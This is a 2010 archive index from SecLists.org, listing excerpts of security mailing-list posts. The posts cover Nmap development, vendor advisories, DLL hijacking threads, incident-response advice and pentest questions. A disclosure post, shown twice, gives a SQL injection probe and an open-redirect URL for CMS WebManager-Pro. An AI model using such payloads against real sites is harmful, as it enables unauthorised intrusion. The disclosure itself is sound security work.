SecLists.Org Security Mailing List Archive
Any hacker will tell you that the latest news and exploits are not
found on any web site—not even Insecure.Org. No, the cutting edge
in security research is and will continue to be the full
disclosure mailing lists such as Bugtraq. Here we provide web
archives and RSS feeds (now including message extracts), updated in real-time, for many of our favorite lists. Browse the individual lists below.
Nmap Development — Unmoderated technical development forum for debating ideas, patches, and suggestions regarding proposed changes to Nmap and related projects.
[NSE] scan traceroute hops
Henri Doreau (Sep 02)
Hello,
2010/8/28 David Fifield <david () bamsoftware com>
trivial, and of course relies upon the promising new target.add() feature.
Regards
Re: [Ncat] I'd like to contribute a feature
miniBill (Sep 02)
2010/7/29 David Fifield <david () bamsoftware com>:
I've rapidly checked ncat_listen.c which is the file which, as far as
I could understand, actually invokes the platform-specific calls. As it
works now it executes the command every time someone connects. What I
would like to do is to have one single command execution, which
collects all the users' input, and whose output is copied to every user.
As small as I can understand it, it won't...
Re: lua brocken in nse script
Seth Graham (Sep 01)
Ok Patrick, I'll do it and I'll comment the results on this list.
Thanks for your help and congratulations for the job in NSE ;),
Seth
2010/9/2 Patrick Donnelly <batrick () batbytes com>
Re: lua brocken in nse script
Patrick Donnelly (Sep 01)
I don't see anything wrong with what you've done from here. Do the
following to see if this helps find the problem:
(1) Configure Nmap with --with-liblua=included. This will make Nmap
statically bind to Lua.
If the problem still occurs, turn Lua assertions on (keeping the above
change for static linking):
(2) Add "-DLUA_USE_APICHECK" to CFLAGS in nmap/liblua/Makefile.
Lua will catch most common errors this way.
Re: lua brocken in nse script
Seth Graham (Sep 01)
Hi Patrick,
2010/9/1 Patrick Donnelly <batrick () batbytes com>
I saw from the output that you are using Gentoo. Are you using the
Yes, I use gentoo and by default my gcc CFLAGS optimizations are set to
-02, configuring nmap 5.21-r1 (with gentoo patches, I attach these) with lua
and ssl support and lua libraries dynamically.
With these optimization compilation flags all my system is working fine (-02
is not so hard to break code...
Re: lua brocken in nse script
Patrick Donnelly (Sep 01)
Hello Seth,
I'm unable to reproduce this problem. I suspect your Nmap is
configured/compiled improperly. Usually when there are GC segfaults it
results from two different Lua installations being linked to (usually
dynamic and static linking). Although, I find this unlikely
considering where the fault occurred.
I saw from the output that you are using Gentoo. Are you using the
installation provided by Gentoo or did you compile Nmap yourself? If...
lua brocken in nse script
Seth Graham (Sep 01)
Hi to everybody,
I'm working on a little nse script to find proxies with method CONNECT
available. I've tested it with some parameters contexts and it works fine,
but when it's working with a very large ip range it crashes. I don't know if
it is a nse engine problem (with multithreading maybe?), a problem in my
little script or in lua libraries.
I write you a Segfault debug to improve some solution. Let's go.
==============================...
Re: rainmap - nmap wrapper for worker process
alexandru (Sep 01)
Thanks for your patience, SVN r20063 should be what you need. The worker code is in src/celeryd and can be run as is on
the worker nodes, provided dependencies are met and with the one caveat that the web-app instance must also be a
RabbitMQ node, though it doesn't need to be involved in scanning.
More details in docs/INSTALL. I'm looking forward to feedback related to either the install doc/procedure, or patches
to make the code better....
Re: Adding new NSE discovered targets to Nmap
Djalal Harouni (Aug 31)
Hi,
I've just merged my nmap-add-targets branch as r20044, so you can go
ahead and use the new NSE library target.lua to add new discovered targets.
Pls keep in mind that currently:
o By targets we mean targets specifications that are supported by Nmap
(hostnames, IP, networks etc).
o There is some target filtering but it is based on target specification
*strings*, and we only filter new targets that are added by NSE scripts,
Nmap targets are...
Re: nmap potentially vulnerable to Windows DLL Hijacking
Rob Nicholls (Aug 31)
This is presumably similar to the Wireshark issue:
http://www.exploit-db.com/exploits/14721/
http://www.nessus.org/plugins/index.php?view=single&id=48943
I must admit I was surprised to hear that Nmap tries to load this file
as it's not one that's usually distributed with WinPcap (it's related to
AirPcap, a separate project from CACE Technologies). I presume we can do
something in Nmap to fix/workaround this issue (perhaps copy whatever
the...
nmap potentially vulnerable to Windows DLL Hijacking
Nikhil Mittal (Aug 31)
Hi,
I was just checking nmap 5.21 for Windows DLL hijacking and it seems that nmap is searching for airpcap.dll in
"insufficient qualified path". If I force nmap to open a file from a network share it does try to load the dll from that
share, it means it is vulnerable? correct me if wrong. I am unable to exploit the vulnerability because while accessing
airpcap.dll from network share I can see FAST IO Disallowed in procmon. I have no idea...
Re: Ncrack 0.2 Alpha - SSH behaviour
ithilgore (Aug 31)
Hello Mike.
The Ncrack engine is built that way so that it initially increases the
number of parallel connections and then as it reaches the maximum capacity
of the server (as determined by closed connections or timeouts), it will
slowly decrease them before finally stabilizing.
Ncrack also uses a username/password pool where it places credentials that
weren't tested successfully (because the connection was prematurely closed
or whatever other...
Re: Ncrack 0.2 Alpha - SSH behaviour
Robin Wood (Aug 31)
Oh well, there goes my theory!
I'll have a look at the ncrack throttling stuff, could be useful in my work.
Robin
RE: Ncrack 0.2 Alpha - SSH behaviour
Mike Westmacott (Aug 31)
Hi Robin,
As I understand it nmap will attempt to determine what the maximum number of concurrent connections is when it starts
up, and will throttle back connections if it starts to see them being closed (according to debug). My issue here is
that I have two large files (I'm not saying it's down to size though!) - both which contain the correct password for
the user - and one of them will correctly identify the password, the other will not. I...
Re: NMAP hangs on MIPS
Nuno Gonçalves (Aug 31)
2010/8/31 Nuno Gonçalves <nunojpg () gmail com>:
The problem is with the use of class std::nmap<port_spec,
service_node> service_table.
line 241: i = service_table.find(ps); takes 50% of the time.
line 274: service_table[ps] = sn; takes 45% of the time.
Any suggestions why is this so slow on MIPS? Do I need optimization flags?
Thanks,
Nuno
Nmap Hackers — Moderated list for the most important new releases and announcements regarding the Nmap Security Scanner and related projects. We recommend that all Nmap users subscribe.
Nmap Defcon Release: Version 5.35DC1
Fyodor (Jul 16)
Hi folks. It has been 3.5 months since the last Nmap release
(5.30BETA1 on March 29), and anyone following the nmap-dev list knows
that we've been very busy during that time. So I'm pleased to release
Nmap version 5.35DC1 containing the fruits of that labor. The Defcon
name is because that conference is awesome! And also because David
Fifield and I have an exciting Nmap talk planned there and at Black
Hat in a couple weeks (see...
Nmap News and Last Chance to Take the Survey
Fyodor (Apr 30)
Hi Folks. I have some Nmap news to share with you:
First off, I'm delighted to introduce the 2010 Nmap/Google Summer of
Code Team! Google has sponsored eight student developers to spend
this summer enhancing the Nmap Security Scanner and related projects,
so you can expect great things in coming months. Ithilgore and Luis
MartinGarcia are returning to improve Ncrack and Nping, new students
Drazen Popovic and Djalal Harouni will be working on...
Survey Reminder
Fyodor (Apr 14)
Hi folks, I have a quick question for you:
Q: What do the Nmap Scripting Engine, Ndiff, and the Zenmap Topology
Mapper have in common?
A: They're all features which were added after you asked for them in
the 2006 Nmap Survey!
With that in mind, I'd like to thank the 1,013 people who have already
taken the 2010 survey. We just need 1,987 more and we can close this
survey up, tabulate and share results, choose the prize winners, and
post...
Nmap/SecTools Survey and GSoC Deadline
Fyodor (Apr 07)
Hello everyone. I hope you're enjoying the 5.30BETA1 release. So far
it has proven stable and functional, so don't let the BETA name scare
you. You can get it at http://nmap.org/download.html. Meanwhile, I
have some great news, and I'm also asking for your help on two things.
The first is that the Nmap Project was again accepted for the Google
Summer of Code program, so we'll have full time coding help this
summer! SoC previously brought us...
Nmap 5.30BETA1 Released w/37 new scripts and new Apple vuln
Fyodor (Mar 29)
Hi folks! It has been two months since the 5.21 release and we've
been very busy during that time! I hope you're happy with the results,
which is a new 5.30BETA1 release made today. Top features include:
o 37 new NSE scripts, bringing the total to 117! New scripts cover
SNMP, SSL, Postgres, MySQL, HTTP, LDAP, NFS, DB2, AFS, and many
more. Also check out the clever host scripts qscan and
ipidseq. Learn about them all at...
Nmap 5.21 released
Fyodor (Jan 27)
Hello everyone. I'm pleased to release Nmap 5.21, which contains zero
exciting new features! It is a bug-fix only release instead,
addressing about a dozen issues discovered since 5.20. Thanks for all
the testing and bug reports! None of the bugs are critical, but we
wanted to polish things up since 5.21 may be the latest stable version
for a while. That gives us time to tackle and stabilize big
development projects. If you want to know...
Lots of Nmap News
Fyodor (Jan 22)
Hi folks. I'm happy to report that the 5.20 release went well. But
with this many improvements, there will always be a few bugs found.
We're planning to round those up with a bugfix-only 5.21 release next
week. So please test out 5.20 and report any problems you experience:
Download Page: http://nmap.org/download.html
Bug Report Instructions: http://nmap.org/book/man-bugs.html
If you're running from a build of the latest SVN checkout, you...
Nmap 5.20 Released
Fyodor (Jan 20)
Happy new year, everyone. I'm happy to announce Nmap 5.20--our first
stable Nmap release since 5.00 last July! It offers more than 150
significant improvements, including:
o 30+ new Nmap Scripting Engine scripts
o enhanced performance and reduced memory consumption
o protocol-specific payloads for more effective UDP scanning
o a completely rewritten traceroute engine
o massive OS and version detection DB updates (10,000+ signatures)
The...
Nmap 5.00 Released!
Fyodor (Jul 16)
Hello everyone. I'm delighted to announce the release of Nmap 5.00!
This is the first major release since 4.50 in 2007, and includes about
600 significant changes since then! We consider this the most
important Nmap release since 1997, and we recommend that all current
users upgrade.
There are too many changes to list them all in this email, so here are
the top 5 improvements in Nmap 5:
1) The new Ncat tool aims to be your Swiss Army Knife...
Nmap news: stable release candidate 4.90RC1, SoC team, and new translations
Fyodor (Jun 26)
Hi Folks. I'm pleased to announce some exciting Nmap news:
[=================Nmap 4.90RC1==================]
It has been nearly 10 months (and 11 dev releases) since 4.76, the
last stable Nmap release. And we've made many dramatic changes, so it
is time for a new stable version! I've posted a release
candidate--4.90RC1--on the Nmap download page:
http://nmap.org/download.html
Please test it out, and let us know if you find any problems...
Nmap 4.85BETA6 now avail w/Conficker detection
Fyodor (Apr 01)
Hi Folks! In case you missed all the news reports yesterday, a couple
great researchers from the Honeynet Project (Tillmann Werner and Felix
Leder) and Dan Kaminsky came up with a way to remotely detect the
Conficker worm which has infected millions of machines worldwide.
Some say 15,000,000 machines infected, but that might just be
exaggerated AV-company BS for all I know. But there are clearly
millions of infections, and this massive botnet...
Nmap News: 4.84BETA4 release, Nmap book news, Summer of Code, Twitter, etc.
Fyodor (Mar 27)
Hello everyone. We've seen 848 messages on nmap-dev this year, but
this is my first post to nmap-hackers. So I have a lot of exciting
Nmap news to fit into this one email!
[=================Nmap 4.85BETA4==================]
While the last release I posted to this list was 4.76 in September of
last year, we've had four beta releases since then with hundreds of
important and dramatic changes. I'm pretty happy with the latest
4.85BETA4 release,...
Bugtraq — The premier general security mailing list. Vulnerabilities are often announced here first, so check frequently!
Vulnerabilities in CMS WebManager-Pro
MustLive (Sep 02)
Hello Bugtraq!
I want to warn you about SQL Injection and Redirector (URL Redirector Abuse)
vulnerabilities in CMS WebManager-Pro (SecurityVulns ID:11108). It's
a Ukrainian commercial CMS.
SQL Injection:
http://site/c.php?id=1%20and%20version()=5
Redirector:
http://site/c.php?id=1&url=http://websecurity.com.ua
Affected products: both systems CMS WebManager-Pro from two developers.
Vulnerable are versions CMS WebManager-Pro up to 8.1...
{PRL} Novell Netware OpenSSH Remote Stack Overflow
Francis Provencher (Sep 02)
#####################################################################################
Application: Novell Netware OpenSSH Remote Stack Overflow
Platforms: Netware 6.5
Exploitation: Remote code execution
CVE Number:
Novell TID: 7006756
ZeroDayInitiative: ZDI-10-169
Author: Francis Provencher (Protek Research Lab's)
Blog: http://www.protekresearchlab.com/...
Moovida Media Player version 2.0.0.15 Insecure DLL Hijacking Vulnerability (libc.dll,quserex.dll)
YGN Ethical Hacker Group (Sep 02)
1. OVERVIEW
The Moovida Media Player application is vulnerable to Insecure DLL
Hijacking Vulnerability. Similar terms that describe this vulnerability
have come up: Remote Binary Planting, Unsafe Library Loading,
and Insecure DLL Loading/Injection/Hijacking/Preloading.
2. PRODUCT DESCRIPTION
Moovida Media Player is a free and open source media center that
allows you to enjoy all of your music, video and pictures
in an awesome...
[ MDVSA-2010:168 ] openssl
security (Sep 02)
_______________________________________________________________________
Mandriva Linux Security Advisory MDVSA-2010:168
http://www.mandriva.com/security/
_______________________________________________________________________
Package : openssl
Date : September 1, 2010
Affected: 2010.1
_______________________________________________________________________
Problem Description:
A vulnerability has been found...
[ MDVSA-2010:169 ] mozilla-thunderbird
security (Sep 02)
_______________________________________________________________________
Mandriva Linux Security Advisory MDVSA-2010:169
http://www.mandriva.com/security/
_______________________________________________________________________
Package : mozilla-thunderbird
Date : September 2, 2010
Affected: 2008.0, 2009.0, 2010.0, 2010.1
_______________________________________________________________________
Problem...
[USN-982-1] Wget vulnerability
Marc Deslauriers (Sep 02)
===========================================================
Ubuntu Security Notice USN-982-1 September 02, 2010
wget vulnerability
CVE-2010-2252
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 6.06 LTS
Ubuntu 8.04 LTS
Ubuntu 9.04
Ubuntu 9.10
Ubuntu 10.04 LTS
This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.
The problem...
XSS vulnerability in ArtGK CMS
advisory (Sep 01)
Vulnerability ID: HTB22588
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_artgk_cms_1.html
Product: ArtGK CMS
Vendor: ArtGK ( http://artgk-cms.ru/ )
Vulnerable Version: 2009-08-28 16:00:00 and Probably Prior Versions
Vendor Notification: 18 August 2010
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking &...
Online Binary Planting Exposure Test
ACROS Lists (Sep 01)
ACROS Security has made the Online Binary Planting Exposure Test publicly accessible
for the benefit of all Windows users. This test should make it easy for users and
administrators to assess their exposure to binary planting attacks originating from
the Internet.
URL: http://www.binaryplanting.com/test.htm
Note that this test is NOT meant to answer whether you're vulnerable (at this point
where so many binary planting vulnerabilities exist out...
XSS vulnerability in Rumba CMS tags
advisory (Sep 01)
Vulnerability ID: HTB22591
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_rumba_cms.html
Product: Rumba CMS
Vendor: Rumba Netware Ltd. ( http://rumbacms.com )
Vulnerable Version: 2.4 and Probably Prior Versions
Vendor Notification: 18 August 2010
Vulnerability Type: Stored XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking...
XSS vulnerability in ArtGK CMS forum
advisory (Sep 01)
Vulnerability ID: HTB22587
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_artgk_cms.html
Product: ArtGK CMS
Vendor: ArtGK ( http://artgk-cms.ru/ )
Vulnerable Version: 2009-08-28 16:00:00 and Probably Prior Versions
Vendor Notification: 18 August 2010
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking &...
XSS vulnerability in Rumba CMS
advisory (Sep 01)
Vulnerability ID: HTB22592
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_rumba_cms_1.html
Product: Rumba CMS
Vendor: Rumba Netware Ltd. ( http://rumbacms.com )
Vulnerable Version: 2.4 and Probably Prior Versions
Vendor Notification: 18 August 2010
Vulnerability Type: Stored XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Low
Credit: High-Tech Bridge SA - Ethical Hacking &...
Tortoise SVN DLL Hijacking Vulnerability
nikhil_uitrgpv (Sep 01)
The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2010-3199 to this issue. This is a
candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems.
XSS vulnerability in Amiro.CMS FAQ
advisory (Sep 01)
Vulnerability ID: HTB22590
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_amiro_cms_1.html
Product: Amiro.CMS
Vendor: Amiro ( http://www.amiro.ru/ )
Vulnerable Version: 5.8.4.0 and Probably Prior Versions
Vendor Notification: 18 August 2010
Vulnerability Type: Stored XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking &...
VMSA-2010-0013 VMware ESX third party updates for Service Console
VMware Security Team (Sep 01)
------------------------------------------------------------------------
VMware Security Advisory
Advisory ID: VMSA-2010-0013
Synopsis: VMware ESX third party updates for Service Console
Issue date: 2010-08-31
Updated on: 2010-08-31 (initial release of advisory)
CVE numbers: CVE-2005-4268 CVE-2010-0624 CVE-2010-2063
CVE-2010-1321 CVE-2010-1168 CVE-2010-1447...
VMSA-2010-0013
VMware Security Team (Sep 01)
------------------------------------------------------------------------
VMware Security Advisory
Advisory ID: VMSA-2010-0013
Synopsis: VMware ESX third party updates for Service Console
Issue date: 2010-08-31
Updated on: 2010-08-31 (initial release of advisory)
CVE numbers: CVE-2005-4268 CVE-2010-0624 CVE-2010-2063
CVE-2010-1321 CVE-2010-1168 CVE-2010-1447...
Full Disclosure — An unmoderated high-traffic forum for disclosure of security information. Fresh vulnerabilities sometimes hit this list many hours before they pass through the Bugtraq moderation queue. The relaxed atmosphere of this quirky list provides some comic relief and certain industry gossip. Unfortunately 80% of the posts are worthless drivel, so finding the gems takes patience.
[ MDVSA-2010:170 ] wget
security (Sep 02)
_______________________________________________________________________
Mandriva Linux Security Advisory MDVSA-2010:170
http://www.mandriva.com/security/
_______________________________________________________________________
Package : wget
Date : September 2, 2010
Affected: 2008.0, 2009.0, 2009.1, 2010.0, 2010.1, Corporate 4.0,
Enterprise Server 5.0...
[ GLSA 201009-01 ] wxGTK: User-assisted execution of arbitrary code
Alex Legler (Sep 02)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201009-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: wxGTK: User-assisted execution of arbitrary code...
Re: DLL hijacking with Autorun on a USB drive
coderman (Sep 02)
sir, you've got a Coyotos stuck in your mustache. what did you eat for lunch?
Re: DLL hijacking with Autorun on a USB drive
coderman (Sep 02)
there are some useful mitigations around these inevitable failures,
http://qubes-os.org/Architecture.html is an example of isolation
rather than correctness i've liked since NetTop wrapped RSBAC policy
around vmware guest isolation...
defense in depth loves company, so application correctness, in
addition to NX / other hw protections on guest/host, in addition to
virtual machine isolation, in addition to RSBAC constraints, in
addition to ......
Re: DLL hijacking with Autorun on a USB drive
Valdis . Kletnieks (Sep 02)
Yeah, but hacking a Harvard architecture is still balls harder than hacking
a von Neumann architecture. ;)
Bug in vde_plug, remote exploitation possible?
halfdog (Sep 02)
Vde (virtual distributed ethernet) is an ethernet compliant virtual network that
can be spawned over a set of physical computers over the internet ... (see
http://vde.sourceforge.net).
The vde_plug (at least on ubuntu hardy) contains a bug, that is triggered when a
certain amount of encapsulated ether frame data is sent to the plug in a
specially timed manner. When the input buffer is filled just with a single byte,
vde_plug uses also the first...
Re: DLL hijacking with Autorun on a USB drive
Pavel Kankovsky (Sep 02)
If your OS's security model "understands" programs and data belong in
different security domains then every instruction of code on your computer
is trusted to enforce that policy. Your line of defence goes through every
program and any bug can breach it. The failure is inevitable. [1]
[1] P. A. Loscocco, S. D. Smalley, P. A. Muckelbauer, R. C. Taylor,
S. J. Turner and J. F. Farrell, "The Inevitability of Failure: The Flawed...
Re: question regarding RSA
Pavel Kankovsky (Sep 02)
You made general questions about RSA as a cryptographic primitive.
There was nothing about PKI in them.
RSA encryption uses public keys. Public keys are--as their name
suggests--supposed to be known publicly. Anyone can compute ciphertexts
from plaintexts. An encryption oracle will not help you crack RSA private
keys. If you can do it with the oracle, you can do it without the oracle
as well.
As far as encryption is concerned the purpose of...
Verizon Wireless security contact?
auto666077 (Sep 02)
I'm looking for a Verizon Wireless security contact to report
somewhat minor security issues with their software. If you know
one, I'd appreciate it if you could reply to me with their contact
info.
[ MDVSA-2010:169 ] mozilla-thunderbird
security (Sep 02)
_______________________________________________________________________
Mandriva Linux Security Advisory MDVSA-2010:169
http://www.mandriva.com/security/
_______________________________________________________________________
Package : mozilla-thunderbird
Date : September 2, 2010
Affected: 2008.0, 2009.0, 2010.0, 2010.1
_______________________________________________________________________
Problem...
Re: DLL hijacking POC (failed, see for yourself)
p8x (Sep 02)
Hi Christian,
I tested the POC here on Win 7 x64 ultimate fully updated and the issue
does work for me.
Vulnerabilities in CMS WebManager-Pro
MustLive (Sep 02)
Hello Full-Disclosure!
I want to warn you about SQL Injection and Redirector (URL Redirector Abuse)
vulnerabilities in CMS WebManager-Pro (SecurityVulns ID:11108). It's
a Ukrainian commercial CMS.
SQL Injection:
http://site/c.php?id=1%20and%20version()=5
Redirector:
http://site/c.php?id=1&url=http://websecurity.com.ua
Affected products: both systems CMS WebManager-Pro from two developers.
Vulnerable are versions CMS WebManager-Pro up to...
Re: DLL hijacking POC (failed, see for yourself)
Jacky Jack (Sep 02)
http://support.microsoft.com/kb/2264107
This is just optional. Not mandatory patch update as far as I know.
[USN-982-1] Wget vulnerability
Marc Deslauriers (Sep 02)
===========================================================
Ubuntu Security Notice USN-982-1 September 02, 2010
wget vulnerability
CVE-2010-2252
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 6.06 LTS
Ubuntu 8.04 LTS
Ubuntu 9.04
Ubuntu 9.10
Ubuntu 10.04 LTS
This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.
The problem...
Re: DLL hijacking POC (failed, see for yourself)
Larry Seltzer (Sep 02)
I don’t think you read my e-mail. They fixed it. Have you retested today?
*From:* Christian Sciberras [mailto:uuf6429 () gmail com]
*Sent:* Thursday, September 02, 2010 9:44 AM
*To:* Larry Seltzer
*Cc:* full-disclosure () lists grok org uk
*Subject:* Re: [Full-disclosure] DLL hijacking POC (failed, see for
yourself)
As I said at the very first email, the POC, even at its best, doesn't work
on my 64bit system at all.
Regards,
Chris.
On Thu,...
Security Basics — A high-volume list which permits people to ask "stupid questions" without being derided as "n00bs". I recommend this list to network security newbies, but be sure to read Bugtraq and other lists as well.
Re: Is Outlook Anywhere secure?
Andre Pawlowski (Sep 02)
After I searched a lot in the net about this topic I often found my
eMail in this list.
Now I have done my research and configuration to this topic and want to
give others a hint where to look. I wrote up information and
configurations about this topic in my blog (only in German)
http://blog.h4des.org/index.php?/archives/279-TMG-als-Proxy-Outlook-Anywhere-hardening.html
So feel free to use it and feel free to ask if something bothers you....
using cvss to assess process problems
robsonde (Sep 02)
our IT managers have asked that we use CVSS to assess security issues for the last few months.
we have quite a good understanding of the system when it is used for "bugs".
but we have a few security issues that are more of a failure of process, people doing the wrong thing and such like.
these risks don't fit the CVSS framework at all, but at the same time we can see that they are security issues that
need to be assessed.
for...
Re: download by specified file type
J. Bakshi (Sep 02)
wget -r -A "*.gif" http://www.test.com
-A >> accept
-r >> recursive download
------------------------------------------------------------------------
Securing Apache Web Server with thawte Digital Certificate
In this guide we examine the importance of Apache-SSL and who needs an SSL certificate. We look at how SSL works, how
it benefits your company and how your customers can tell if a site is secure. You will find out...
Outlook anywhere
exzactly (Aug 31)
Has anyone else seen implementations of Outlook Anywhere? Personally I think
it's not needed and a security risk but I want to see what the community has
to say.
download by specified file type
who cat (Aug 31)
I wanna know how to use wget or curl to download the specified file,
e.g., download all the GIF files from http://www.test.com
How can I achieve that?
Thanks!
All you best
------------------------
What we are struggling for ?
The life or the life ?
RE: RainbowCrack rainbow table generate
Pete.LeMay (Aug 27)
Check out the tables at freerainbowtables.com. If those don't suit your needs, the forum has several discussions on
this question.
-----Original Message-----
From: listbounce () securityfocus com [mailto:listbounce () securityfocus com] On Behalf Of win.a
Sent: Wednesday, August 25, 2010 11:39 PM
To: security-basics () securityfocus com
Subject: RainbowCrack rainbow table generate
I want to use rainbowcrack to generate the rainbow table, but...
RainbowCrack rainbow table generate
win.a (Aug 26)
I want to use rainbowcrack to generate the rainbow table,
but I don't know how I can determine the parameters:
chain_len
chain_num
Is there a way to calculate it? Any suggestions are appreciated.
All you best
------------------------
What we are struggling for ?
The life or the life ?
Re: security advice
Erik (Aug 26)
On 25-8-2010 9:14, Andrei Popescu wrote:
Hi,
Be warned! Usually it is never "only a counterstrike server". Do not
trust the box and reinstall. I've seen and investigated a hacked box
where it was thought to "only run a psybounce". It turned out a lot more
was happening but since the kernel was made to shut up about it, it
would not show the rest of the activities. It was a database server for
provisioning an ISP. A...
[HITB-Announce] HITB2010 SIGNINT Sessions
Hafez Kamal (Aug 26)
Hack In The Box is proud to announce a brand new lightning session
called HITB SIGINT (Signal Intelligence/Interrupt)! HITB SIGINT
sessions are designed to provide a quick 15 minute overview for
material and research that's up and coming - stuff that isn't quite
ready for the mainstream tracks of the conference but deserves a mention
nonetheless. Final year students who want to present their projects to
industry experts are also strongly...
RE: security advice
Andrei Popescu (Aug 25)
Hello,
I had something like this also.. I still have all the files, but in
my case the "hacker" just ran a CounterStrike server on my box. I have
found the exploit in a website that I host, it was an oscommerce and it had
a security issue in the pictures folder.. don't know how he had access but
the thing is he managed to reinstall openssh and somehow he got the root
password (not change it, I saw him logging in the...
RE: security advice
Grant, Richard (KYTC) (Aug 25)
Edmund I think you may need a different approach to Incident handling. We have experienced a couple compromised
servers. With over 3,000 servers physical and virtual we are too big of a target to miss forever. First the horse is
already out of the barn. Slamming the door shut will not change that.
This is a time for the Incident Handling Team to be called into action. This team would develop a plan for dealing
with the incident. Some of the...
Re: security advice
debiantech (Aug 25)
Hi,
Although not the only way this can happen, I am willing to bet this
machine is not only an email server but a public web server. Not only
this but a guess is you are running some sort of CMS/CRM on that
webserver that uses PHP, possibly a web based email interface. If I have
been right so far, my first suggestion is to go to the home page for the
software and compare the version you have to the current stable version
and read the...
Re: security advice
Robert Larsen (Aug 25)
Not knowing how you work makes your question hard to answer but a few
quick ones:
* Keep the system up to date (apt-get update && apt-get upgrade or similar)
* Install a host based intrusion detection system like Tripwire or AIDE
* Install a network based intrusion detection system like Snort
* Harden your installations with something like Bastille
* Run your system from a read-only filesystem and having only your mail
folders on writable...
Re: security advice
Mike Razzell (Aug 25)
Maybe this is considered obvious to others of greater experience or
expertise in the field but doesn't the possibility exist that they
could look at all the logs and configurations and find no
vulnerability permitting a point of entry if a user with
administrative credentials logged in from a compromised client or
(less likely IMO) over an unsecured connection ie. plaintext. If this
is the case you could fix everything you find and still get...
RE: security advice
Murda (Aug 25)
Hey Edmund,
First and foremost I will commend your honesty. Unfortunately, the fear of
reprimand can often cloud this area so much that people begin lying to cover
themselves; which then means that resolutions are harder to achieve. This
candour is exactly what is needed when investigating and responding to an
incident. Also make sure you document everything you did and do (as much as
is reasonable).
I think you would still benefit from having an...
Penetration Testing — While this list is intended for "professionals", participants frequently disclose techniques and strategies that would be useful to anyone with a practical interest in security and network auditing.
Re: WAF Testing..suggestions??
bin4ry (Sep 01)
Hey False,
one thing you should keep in mind: While I was pentesting mod_security
and a bunch of commercial WAFs, I recognized that most of the products
work pretty well with popular assessment tools (w3af, etc.). They
detected most of the attacks. Afterwards I set up a vulnerable website
and tried to manually attack it. There was a huge difference: A lot of
manual attacks were not recognized. I guess this is because most of
those WAF vendors try...
Re: WAF Testing..suggestions??
Yiannis Koukouras (Sep 01)
Hi False,
You can also try Http Parameter Pollution (HPP) attacks
http://www.securitytube.net/HTTP-Parameter-Pollution-%28HPP%29-Attack-video.aspx
Cheers,
Ioannis (Yiannis) Koukouras
CISSP, CISA, CISM
MSc in Computer Systems Security
BEng in Electronic Engineering
http://www.linkedin.com/in/ikoukouras
---
The information contained in this communication is intended solely
for the use of the individual or entity to whom it is addressed
and...
Re: Pentestn ASP website with tinymce
Robin Wood (Sep 01)
Exploit DB is a good start:
http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=tinymce&filter_author=&filter_platform=0&filter_type=0&filter_port=&filter_osvdb=&filter_cve=
And Security Focus
http://www.securityfocus.com/vulnerabilities
It's better than some of the native speakers!
Robin
------------------------------------------------------------------------
This list is...
nullcon Goa dwitiya (2.0) Call For Papers
nullcon (Sep 01)
nullcon Dwitiya (2.0)
The Jugaad(hacking) Conference
nullcon is an initiative by null - The open security community.
Website:
http://nullcon.net
Calling all Jugaadus(hackers)
It's the time of the year when we welcome research done by the
community as paper submissions for nullcon.
So, sip your coffee, dust your debuggers, fire your tools, challenge
your grey cells and shoot us an email.
Tracks:
---------------
- Bakkar: 1 Hr Talks
-...
Re: Pentestn ASP website with tinymce
Justin Klein Keane (Sep 01)
Hello,
TinyMCE is a JavaScript based WYSIWYG editor, not a content management
system. TinyMCE can be configured to run independently of any dynamic
code, and doesn't present any security vulnerability by itself. TinyMCE
has had problems in the past with file manipulation that involved unsafe
dynamic scripting (such as PHP).
Justin Klein Keane, C|EH CEPT
http://www.MadIrish.net
Pentestn ASP website with tinymce
Luana C. Rocha (Aug 31)
Hi,
The company I work for is in the process of evaluating a new website.
They are not concerned about security, but with how easy it is to update
the website content.
At this moment the developer that is winning this evaluation is
proposing to use tinymce as a content manager.
I read about tinymce and I'm really concerned about our security.
Does anyone use tinymce? Can anyone point me to a good way to pentest
this site and how to enforce...
RE: Pentest - ISA server
Christopher M (Aug 31)
I've witnessed this sort of behavior when an Untangle box (www.untangle.com)
was in place in front of ISA acting as a unified threat management bridge.
It acts as a catch all for inbound traffic.
Christopher.
-----Original Message-----
From: listbounce () securityfocus com [mailto:listbounce () securityfocus com] On
Behalf Of Ravipriya Thushara
Sent: Sunday, August 29, 2010 11:09 PM
To: Boyd, Chad
Cc: Kurt M. John; <pen-test () securityfocus...
Re: Pentest - ISA server
Volker Tanger (Aug 30)
Greetings!
"Kurt M. John" <kurt.md.john () gmail com>:
What options did you use on NMAP?
By default it runs a SYN scan (-sS), and if the firewall or server
tested does some type of SYN-Flood-Protection, it will send SYN-ACK
packages without actually querying the host behind it (maybe adding
TCP-cookies).
By default NMAP will count SYN-ACK answers to SYN queries as open port.
Try running a connect scan (-sT) which runs through...
Re: Pentest - ISA server
TAS (Aug 30)
Hi,
